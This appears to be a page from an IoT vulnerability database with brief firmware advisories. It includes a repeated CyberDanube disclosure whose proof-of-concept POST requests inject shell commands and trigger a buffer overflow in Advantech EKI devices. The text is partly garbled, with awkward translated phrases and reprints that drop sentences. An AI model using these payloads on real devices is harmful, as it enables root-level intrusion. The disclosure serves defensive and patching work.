VARIoT IoT vulnerabilities database

Versions 00.07.00 through 00.07.03 of Teltonika’s RUT router firmware contain an operating system (OS) command injection vulnerability in a Lua service. An attacker could exploit a parameter in the vulnerable function that calls a user-provided package name by instead providing a package with a malicious name that contains an OS command injection payload. rut200 firmware, rut240 firmware, rut241 firmware etc. (DoS) It may be in a state

Version 00.07.03.4 and prior of Teltonika’s RUT router firmware contain a packet dump utility that contains proper validation for filter parameters. However, variables for validation checks are stored in an external configuration file. An authenticated attacker could use an exposed UCI configuration utility to change these variables and enable malicious parameters in the dump utility, which could result in arbitrary code execution. rut200 firmware, rut240 firmware, rut241 firmware etc. teltonika-networks The product contains vulnerabilities related to external control of system configuration or settings.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

A vulnerability was found in Tenda AC23 16.03.07.45_cn. It has been declared as critical. This vulnerability affects unknown code of the file /bin/ate of the component Service Port 7329. The manipulation of the argument v2 leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. of ac23 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The vulnerability stems from the fact that the parameter v2 of the file /bin/ate fails to properly filter special characters and commands in the construction command. Attackers can use this vulnerability to cause arbitrary command execution

A vulnerability has been found in TP-Link Archer C7v2 v2_en_us_180114 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component GET Request Parameter Handler. The manipulation leads to denial of service. The attack can only be done within the local network. The associated identifier of this vulnerability is VDB-228775. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. TP-LINK Technologies of Archer C7 There are unspecified vulnerabilities in the firmware.Service operation interruption (DoS) It may be in a state

Improper input validation for some Intel(R) BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. Intel's compute stick stk2mv64cc There are unspecified vulnerabilities in the firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

Improper access control for some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable denial of service via local access. nuc 8 compute element cm8i3cb4n firmware, nuc 8 compute element cm8i5cb8n firmware, nuc 8 compute element cm8i7cb8n Multiple Intel products such as firmware have unspecified vulnerabilities.Service operation interruption (DoS) It may be in a state

A vulnerability has been identified in SIMATIC Cloud Connect 7 CC712 (All versions >= V2.0 < V2.1), SIMATIC Cloud Connect 7 CC716 (All versions >= V2.0 < V2.1). The web based management of affected devices does not properly validate user input, making it susceptible to command injection. This could allow an authenticated privileged remote attacker to execute arbitrary code with root privileges. Siemens' 6gk1411-1ac00 firmware and 6gk1411-5ac00 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. SIMATIC Cloud Connect 7 is an IoT gateway for connecting programmable logic controllers to cloud services and allows field devices to be interfaced with OPC UA servers as OPC UA clients

A vulnerability has been identified in SCALANCE LPE9403 (All versions < V2.1). The web based management of affected device does not properly validate user input, making it susceptible to command injection. This could allow an authenticated remote attacker to access the underlying operating system as the root user. Siemens' SCALANCE LPE9403 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Siemens SCALANCE LPE9403 is a local processing driver

A vulnerability has been identified in SCALANCE LPE9403 (All versions < V2.1). The `i2c` mutex file is created with the permissions bits of `-rw-rw-rw-`. This file is used as a mutex for multiple applications interacting with i2c. This could allow an authenticated attacker with access to the SSH interface on the affected device to interfere with the integrity of the mutex and the data it protects. Siemens' SCALANCE LPE9403 There is a vulnerability in the firmware related to temporary file creation with access permissions.Information may be tampered with. Siemens SCALANCE LPE9403 is a local processing driver

A vulnerability has been identified in SCALANCE LPE9403 (All versions < V2.1). A path traversal vulnerability was found in the `deviceinfo` binary via the `mac` parameter. This could allow an authenticated attacker with access to the SSH interface on the affected device to read the contents of any file named `address`. Siemens SCALANCE LPE9403 is a local processing driver

A vulnerability in the CLI of Cisco SDWAN vManage Software could allow an authenticated, local attacker to delete arbitrary files. This vulnerability is due to improper filtering of directory traversal character sequences within system commands. An attacker with administrative privileges could exploit this vulnerability by running a system command containing directory traversal character sequences to target an arbitrary file. A successful exploit could allow the attacker to delete arbitrary files from the system, including files owned by root. Cisco Systems Cisco Catalyst SD-WAN Manager and Cisco SD-WAN vManage Exists in a past traversal vulnerability.Information is tampered with and service operation is interrupted (DoS) It may be in a state. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vmanage-wfnqmYhN

Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stack-based Buffer Overflow vulnerability, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series vulnerable version| 1.21 fixed version| 1.24 CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575 impact| High homepage| https://advantech.com found| 2023-03-06 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. P\xf6lten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence." Source: https://www.advantech.com/en/about Vulnerable versions ------------------------------------------------------------------------------- EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors. 2) Buffer Overflow (CVE-2023-2575) The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background: 1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94. 1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574) The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94. 2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== The serial port of the device provides error messages, which already indicate that the stack has been corrupted: / # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 *** *** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 *** Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...] The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update the product to the latest available firmware version. Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2023

Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series vulnerable version| 1.21 fixed version| 1.24 CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575 impact| High homepage| https://advantech.com found| 2023-03-06 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. P\xf6lten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence." Source: https://www.advantech.com/en/about Vulnerable versions ------------------------------------------------------------------------------- EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background: 1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94. 1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574) The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94. 2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== The serial port of the device provides error messages, which already indicate that the stack has been corrupted: / # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 *** *** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 *** Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...] The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update the product to the latest available firmware version. Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2023

H3C GR-1200W MiniGRW1A0V100R006 was discovered to contain a stack overflow via the function set_tftp_upgrad. H3C of gr-1200w An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. H3C GR-1200W is a gigabit enterprise wireless router produced by China H3C (H3C). The H3C GR-1200W MiniGRW1A0V100R006 version has a buffer overflow vulnerability. A remote attacker could exploit this vulnerability to execute arbitrary code

Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series vulnerable version| 1.21 fixed version| 1.24 CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575 impact| High homepage| https://advantech.com found| 2023-03-06 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. P\xf6lten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence." Source: https://www.advantech.com/en/about Vulnerable versions ------------------------------------------------------------------------------- EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors. 2) Buffer Overflow (CVE-2023-2575) The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background: 1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94. 2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80 =============================================================================== The serial port of the device provides error messages, which already indicate that the stack has been corrupted: / # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 *** *** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 *** Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...] The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update the product to the latest available firmware version. Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2023

